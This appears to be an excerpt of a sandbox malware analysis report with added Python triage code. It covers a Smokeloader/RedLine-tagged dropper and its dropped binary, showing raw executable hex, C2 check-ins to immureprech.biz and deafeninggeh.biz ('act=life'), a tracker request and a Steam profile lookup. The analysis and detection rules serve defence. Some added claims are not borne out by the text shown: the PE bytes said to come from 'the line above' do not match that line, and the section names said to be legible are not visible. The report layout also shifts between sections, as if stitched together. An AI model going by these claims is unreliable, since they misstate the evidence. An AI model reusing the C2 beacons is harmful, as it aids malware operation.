                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259388924 CET1236INData Raw: 00 00 00 85 c0 74 03 50 ff d6 8b 87 b8 00 00 00 85 c0 74 03 50 ff d6 8b 87 b4 00 00 00 85 c0 74 03 50 ff d6 8b 87 c0 00 00 00 85 c0 74 03 50 ff d6 8d 5f 50 c7 45 08 06 00 00 00 81 7b f8 d0 47 44 00 74 09 8b 03 85 c0 74 03 50 ff d6 83 7b fc 00 74
                                                                                                                                                                                                                                                                                    Data Ascii: tPtPtPtP_PE{GDttP{tCtPMuP^[_]t7t3V0;t(W8YtVE>YuGDtVYY^3jhx&DT,GDFpt"~ltpluj Yg
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378681898 CET1236INData Raw: e8 46 e4 ff ff 59 c7 45 fc 01 00 00 00 8b 7e 6c 85 ff 74 23 57 e8 f3 fa ff ff 59 3b 3d b0 48 44 00 74 14 81 ff d8 47 44 00 74 0c 83 3f 00 75 07 57 e8 ff f8 ff ff 59 c7 45 fc fe ff ff ff e8 1e 00 00 00 56 e8 74 d8 ff ff 59 e8 3a ef ff ff c2 04 00
                                                                                                                                                                                                                                                                                    Data Ascii: FYE~lt#WY;=HDtGDt?uWYEVtY:ujYujYVWpDV$DuVY^5HDhDWhDWoDhDWoDhDWoD=oD5DoDt=oDt=oDtu$D
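The response above declares Content-Type: application/x-msdos-program and its Data Raw begins with the MZ/PE headers, so the first few hundred bytes already answer the usual triage questions (architecture, link time, entry point, which exploit mitigations the image opted into). The Python below is an added example and not part of the Joe Sandbox report: RAW_PREFIX is the Data Raw prefix reproduced from the line above, parsed with the documented IMAGE_DOS_HEADER, IMAGE_FILE_HEADER and PE32 IMAGE_OPTIONAL_HEADER layouts. The report truncates the dump before the section table, so sections are counted but not parsed.

```python
"""Parse the MZ/PE headers of the executable served in the stream above.

Added example, not Joe Sandbox code. RAW_PREFIX is the "Data Raw" prefix of
the HTTP response exactly as printed in the report (338 bytes survive the
truncation, enough for the DOS, file and PE32 optional headers).
"""
import struct
from datetime import datetime, timezone
from typing import Any, Dict, List

RAW_PREFIX = bytes.fromhex(
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00"
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f"
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00"
    "17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa"
    "4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa"
    "4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa"
    "00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01"
    "0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00"
    "00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00"
    "9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00"
)

MACHINES = {0x14C: "i386", 0x8664: "AMD64", 0xAA64: "ARM64"}
# IMAGE_FILE_* characteristics (file header) and IMAGE_DLLCHARACTERISTICS_* (optional header).
FILE_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
              0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_FLAGS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
             0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
# First 80 bytes of the PE32 optional header, through SizeOfStackCommit.
OPT_HEADER_PE32 = struct.Struct("<HBBIIIIIIIIIHHHHHHIIIIHHII")


def _flags(value: int, table: Dict[int, str]) -> List[str]:
    return [name for bit, name in table.items() if value & bit]


def parse_pe_headers(data: bytes) -> Dict[str, Any]:
    """Walk e_lfanew to the PE signature and decode the file + optional headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("e_lfanew does not point at a PE signature")
    machine, nsections, tstamp, _symtab, _nsyms, _opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if len(data) < opt_off + OPT_HEADER_PE32.size:
        raise ValueError("optional header truncated")
    (magic, maj_link, min_link, size_code, _size_init, _size_uninit, entry,
     _base_code, _base_data, image_base, sect_align, file_align,
     _maj_os, _min_os, _maj_img, _min_img, _maj_sub, _min_sub, _win32ver,
     size_image, size_headers, checksum, subsystem, dll_chars,
     stack_reserve, _stack_commit) = OPT_HEADER_PE32.unpack_from(data, opt_off)
    if magic != 0x10B:
        raise ValueError(f"unexpected optional header magic {magic:#x} (not PE32)")
    return {
        "machine": machine, "machine_name": MACHINES.get(machine, "unknown"),
        "number_of_sections": nsections,
        "timestamp": tstamp,
        "timestamp_utc": datetime.fromtimestamp(tstamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "characteristics": chars, "file_flags": _flags(chars, FILE_FLAGS),
        "linker_version": f"{maj_link}.{min_link}",
        "size_of_code": size_code, "entry_point": entry, "image_base": image_base,
        "section_alignment": sect_align, "file_alignment": file_align,
        "size_of_image": size_image, "size_of_headers": size_headers, "checksum": checksum,
        "subsystem": subsystem,
        "dll_characteristics": dll_chars, "dll_flags": _flags(dll_chars, DLL_FLAGS),
        "stack_reserve": stack_reserve,
    }


def mitigation_notes(info: Dict[str, Any]) -> List[str]:
    """Point out missing loader-side mitigations that matter when exploiting or emulating the sample."""
    notes = []
    if "DYNAMIC_BASE" not in info["dll_flags"]:
        notes.append(f"no ASLR: DYNAMIC_BASE clear, image fixed at {info['image_base']:#x}")
    if "RELOCS_STRIPPED" in info["file_flags"]:
        notes.append("relocations stripped, so the loader could not rebase it anyway")
    if "NX_COMPAT" not in info["dll_flags"]:
        notes.append("NX_COMPAT clear: stack/heap may be executable")
    return notes


if __name__ == "__main__":
    hdr = parse_pe_headers(RAW_PREFIX)
    for key, value in hdr.items():
        print(f"{key:22s} {value:#x}" if isinstance(value, int) else f"{key:22s} {value}")
    for note in mitigation_notes(hdr):
        print("!", note)
```

NumberOfSections = 4 agrees with the four section names (.text, .rdata, .data, .rsrc) still legible in the Data Ascii rendering. DllCharacteristics 0x8100 has NX_COMPAT and TERMINAL_SERVER_AWARE set but not DYNAMIC_BASE, and the file header carries RELOCS_STRIPPED, so this 32-bit GUI image always loads at 0x400000 without ASLR. The link timestamp decodes to 2023-10-20 20:11:19 UTC; treat it as a hint only, since the field is trivially forged.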


Session ID: 0  Source: 192.168.2.8:49705  Destination: 104.21.56.70:443  PID: 3284  Process: C:\Users\user\Desktop\AZCFTWko2q.exe

2024-12-15 08:20:23 UTC  90 bytes  OUT
  GET /track_prt.php?sub=0&cc=DE HTTP/1.1
  User-Agent: ShareScreen
  Host: post-to-me.com
2024-12-15 08:20:23 UTC  796 bytes  IN
  HTTP/1.1 200 OK
  Date: Sun, 15 Dec 2024 08:20:23 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  X-Powered-By: PHP/5.4.16
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFrjQROX7DtgqR4tCUfxRN1do2mr%2BQ8QHqHRwXTiefNADlwzUnRKn2CglzCnpPeeSvYHrDLZ26lUiZ51Ru129cjOOOkhEa9Ar9fDCPSmjYsOwdnMxrGLofhziE6TkHbyUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f25039ddeb8f795-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1652&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1749550&cwnd=178&unsent_bytes=0&cid=8543a9276c720235&ts=634&x=0"
2024-12-15 08:20:23 UTC  7 bytes  IN
  Data Raw: 32 0d 0a 6f 6b 0d 0a
  Data Ascii: 2ok
2024-12-15 08:20:23 UTC  5 bytes  IN
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID: 1  Source: 192.168.2.8:49707  Destination: 172.67.207.38:443  PID: 5868  Process: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe

2024-12-15 08:20:31 UTC  262 bytes  OUT
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: immureprech.biz
2024-12-15 08:20:31 UTC  8 bytes  OUT
  Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-12-15 08:20:31 UTC  1017 bytes  IN
  HTTP/1.1 200 OK
  Date: Sun, 15 Dec 2024 08:20:31 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=i5ieutg0c21pkcejh6a9vo33g4; expires=Thu, 10-Apr-2025 02:07:10 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W50U6mfpqP1zNvmhdo9bEwTsxzvDjIl3UaVj2jM4IFr6DPDFuEvtthAQyl2%2F%2BwwVQHhD5wKZwqBMBIEBb%2FXiwci3gJgV%2B3wHPD7s%2Fxq%2F6monnOq9zwVJoRJN4MEfZUL5kvo%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f2503d0aeab4378-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1552&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1770770&cwnd=235&unsent_bytes=0&cid=da03abd7d39ec9b8&ts=734&x=0"
2024-12-15 08:20:31 UTC  15 bytes  IN
  Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-12-15 08:20:31 UTC  5 bytes  IN
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0
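Two request shapes are captured in these sessions: the dropper's tracking GET with the bare "ShareScreen" User-Agent and a country code in the query string (session 0), and the dropped 86DC.tmp.exe's 8-byte form-encoded POST /api with body act=life behind a stock Chrome User-Agent (session 1, and the identical check-in to deafeninggeh.biz that follows). They are enough to write a small triage rule. The Python below is an added example, not part of the Joe Sandbox report or its tooling; the sample messages are reassembled from the stream tables on this page (they come back to the same 90- and 262-byte lengths the report shows), the benign request is a constructed control case, and the rule thresholds are assumptions that would need tuning against real traffic.

```python
"""Triage rules for the HTTP patterns captured in this report's network streams.

Added example (not Joe Sandbox code). TRACK_REQUEST and BEACON_REQUEST are
reassembled from the report's session tables; BENIGN_REQUEST is constructed.
"""
import re
from typing import Any, Dict, List

# Session 0: the tracking GET sent by the dropper, as captured (90 bytes).
TRACK_REQUEST = (
    "GET /track_prt.php?sub=0&cc=DE HTTP/1.1\r\n"
    "User-Agent: ShareScreen\r\n"
    "Host: post-to-me.com\r\n"
    "\r\n"
)

# Session 1: the check-in sent by 86DC.tmp.exe, as captured (262 bytes + 8-byte body).
BEACON_REQUEST = (
    "POST /api HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Content-Length: 8\r\n"
    "Host: immureprech.biz\r\n"
    "\r\n"
    "act=life"
)

# Constructed control case: an ordinary browser page fetch (not from the report).
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Host: example.com\r\n"
    "\r\n"
)

# Response headers of the executable download shown at the top of this section.
DOWNLOAD_RESPONSE_HEADERS = {
    "content-type": "application/x-msdos-program",
    "content-length": "361984",
}


def parse_request(raw: str) -> Dict[str, Any]:
    """Split a raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


# Real browsers announce themselves with a "Mozilla/5.0 (" prefix; anything else from a
# desktop host deserves a look (assumption: no legitimate custom HTTP clients in scope).
BROWSER_UA = re.compile(r"^Mozilla/5\.0 \(")
# Shape of the captured check-in body: exactly one act=<verb> pair and nothing else.
CHECKIN_BODY = re.compile(r"^act=[a-z_]+$")
# Two-letter country code in the query string, as in the sub=0&cc=DE tracker hit.
GEO_PARAM = re.compile(r"[?&]cc=[A-Z]{2}(?:&|$)")


def classify(req: Dict[str, Any]) -> List[str]:
    """Return human-readable findings for one parsed request (empty list means clean)."""
    findings: List[str] = []
    headers = req["headers"]
    host = headers.get("host", "")
    ua = headers.get("user-agent", "")
    if (req["method"] == "POST" and req["target"] == "/api"
            and headers.get("content-type") == "application/x-www-form-urlencoded"
            and CHECKIN_BODY.match(req["body"])):
        findings.append(f"form-encoded /api check-in to {host} ({req['body']})")
    if not BROWSER_UA.match(ua):
        findings.append(f"non-browser User-Agent {ua!r} to {host}")
    if req["method"] == "GET" and GEO_PARAM.search(req["target"]):
        findings.append(f"geo-tagged tracker request {req['target']} to {host}")
    return findings


def is_executable_download(headers: Dict[str, str], body_prefix: bytes) -> bool:
    """True when a response carries a PE, by declared type or by the MZ magic in the body."""
    return (headers.get("content-type", "") == "application/x-msdos-program"
            or body_prefix[:2] == b"MZ")


if __name__ == "__main__":
    for raw in (TRACK_REQUEST, BEACON_REQUEST, BENIGN_REQUEST):
        req = parse_request(raw)
        print(req["method"], req["target"], "->", classify(req) or "clean")
    print("executable download:", is_executable_download(DOWNLOAD_RESPONSE_HEADERS, b"MZ\x90\x00"))
```

The check-in carries a stock Chrome User-Agent, so a User-Agent rule alone only catches the dropper's tracker hit; the beacon is identified by path, content type and the one-pair body. Both C2 names resolve to Cloudflare addresses (104.21.x.x, 172.67.x.x), so block and hunt on the hostnames, not the IPs.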


Session ID: 2  Source: 192.168.2.8:49708  Destination: 104.21.16.1:443  PID: 5868  Process: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe

2024-12-15 08:20:33 UTC  263 bytes  OUT
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: deafeninggeh.biz
2024-12-15 08:20:33 UTC  8 bytes  OUT
  Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-12-15 08:20:34 UTC  1016 bytes  IN
  HTTP/1.1 200 OK
  Date: Sun, 15 Dec 2024 08:20:34 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=fsre4q3663h0q86dq4979eaeh8; expires=Thu, 10-Apr-2025 02:07:12 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEfK1hwbxpGbxysES3GENKRE6aqXrk%2Bs%2BZm7b%2B9t4mE%2F755smXMB9qcAkpc6rpEZSp3IFGzpJ8ysRO2ZX3IvaJwp8IOM2uBtDPvo%2Fv4hIsFO5EmAwJ1lHa%2ByaadEstRpfm5K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8f2503dda83c8ce0-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1769&rtt_var=675&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1606160&cwnd=206&unsent_bytes=0&cid=0ebe5589ecdf8d2e&ts=1003&x=0"
2024-12-15 08:20:34 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: a\r\nerror #D12\r\n (chunk-size line "a" = 0xa = 10 bytes, followed by the 10-byte chunk body "error #D12"; the CR/LF framing bytes are present in the raw dump but dropped from the ASCII rendering)
2024-12-15 08:20:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n (zero-size chunk that terminates the chunked body; the server closes the connection afterwards, as announced by Connection: close)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49711 | 23.55.153.106 | 443 | 5868 | C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-15 08:20:36 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-15 08:20:37 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 15 Dec 2024 08:20:37 GMT
Content-Length: 35131
Connection: close
Set-Cookie: sessionid=4670f5074b9bfea360f04536; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-15 08:20:37 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-15 08:20:37 UTC | 10097 | IN | Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-15 08:20:37 UTC | 10555 | IN | Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75
Data Ascii: ;WEB_UNIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&qu
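The two sessions above record the two network behaviours worth detecting in this trace: an 8-byte POST body "act=life" to deafeninggeh.biz answered with a chunked "error #D12", and a GET for a 17-digit SteamID64 profile on steamcommunity.com issued by a binary running from the user's Temp directory (LummaC is widely documented to resolve its C2 from a Steam profile name; the report itself records only the lookup). The following is an added example, not code from the report or the sample: it decodes the chunked C2 reply from the raw bytes shown above and classifies constructed session records modelled on these two exchanges. Assumptions are labelled in the code: the request line and originating process of the POST are not visible in this excerpt, so that record uses a placeholder path "/" and assumes the same Temp binary, and the steam.exe control record is entirely constructed.

```python
"""Added example (not part of the Joe Sandbox report): decode the chunked C2 reply
and classify HTTP session records modelled on the two sessions in the report."""
import re
from dataclasses import dataclass, field

# Raw bytes copied from the report's "Data Raw" lines for the deafeninggeh.biz reply.
C2_REPLY_CHUNK = bytes.fromhex("61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a")
C2_REPLY_END = bytes.fromhex("30 0d 0a 0d 0a")


def decode_chunked(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: <hex size>[;ext]\\r\\n<data>\\r\\n ... 0\\r\\n\\r\\n.
    Raises ValueError on broken or truncated framing instead of returning partial data."""
    out = bytearray()
    pos = 0
    while True:
        line_end = body.find(b"\r\n", pos)
        if line_end < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:line_end].split(b";")[0], 16)  # chunk extensions ignored
        pos = line_end + 2
        if size == 0:
            return bytes(out)  # last-chunk reached; trailers are not needed here
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk or missing CRLF after chunk data")
        out += chunk
        pos += size + 2


@dataclass
class HttpSession:
    """One request as the sandbox records it: originating process plus request fields."""
    process: str
    host: str
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


# First check-in seen in the report: 8-byte form body, matching Content-Length: 8.
LUMMA_BEACON_BODY = b"act=life"
# 17-digit SteamID64 profile path, as in GET /profiles/76561199724331900.
STEAM_PROFILE_PATH = re.compile(r"^/profiles/\d{17}$")
TEMP_DIR_MARKER = "\\AppData\\Local\\Temp\\"


def classify(session: HttpSession) -> list[str]:
    """Return the behaviour labels that apply to one session (empty list if none)."""
    labels = []
    if session.method == "POST" and session.body == LUMMA_BEACON_BODY:
        declared = session.headers.get("Content-Length")
        if declared is None or int(declared) == len(session.body):
            labels.append("lumma-life-beacon")
    if (session.host == "steamcommunity.com"
            and STEAM_PROFILE_PATH.match(session.path)
            and TEMP_DIR_MARKER in session.process):
        labels.append("steam-profile-lookup-from-temp-binary")
    return labels


def scan(sessions: list[HttpSession]) -> dict[str, list[str]]:
    """Group labels by originating process; processes with no labels are omitted."""
    findings: dict[str, list[str]] = {}
    for s in sessions:
        for label in classify(s):
            findings.setdefault(s.process, []).append(label)
    return findings


# Constructed records. Values come from the report where visible; the POST's path ("/")
# and originating process are assumptions, and the steam.exe record is a benign control.
SAMPLE_SESSIONS = [
    HttpSession(r"C:\Users\user\AppData\Local\Temp\86DC.tmp.exe", "deafeninggeh.biz",
                "POST", "/", {"Content-Length": "8"}, LUMMA_BEACON_BODY),
    HttpSession(r"C:\Users\user\AppData\Local\Temp\86DC.tmp.exe", "steamcommunity.com",
                "GET", "/profiles/76561199724331900", {"Connection": "Keep-Alive"}),
    HttpSession(r"C:\Program Files (x86)\Steam\steam.exe", "steamcommunity.com",
                "GET", "/profiles/76561199724331900"),
]

if __name__ == "__main__":
    print(decode_chunked(C2_REPLY_CHUNK + C2_REPLY_END))
    print(scan(SAMPLE_SESSIONS))
```

The beacon check insists that any declared Content-Length agree with the body, so a record whose body was cut short by capture is not scored as a beacon; the Steam check deliberately keys on the originating process rather than the URL alone, since the same profile request from the Steam client or a browser is ordinary traffic.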



Target ID: 0
Start time: 03:20:17
Start date: 15/12/2024
Path: C:\Users\user\Desktop\AZCFTWko2q.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\AZCFTWko2q.exe"
Imagebase: 0x400000
File size: 429'056 bytes
MD5 hash: 7C13E0CBD1513ABE7F2D2D73CC0AD615
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 3
Start time: 03:20:26
Start date: 15/12/2024
Path: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
Wow64 process (32bit): true
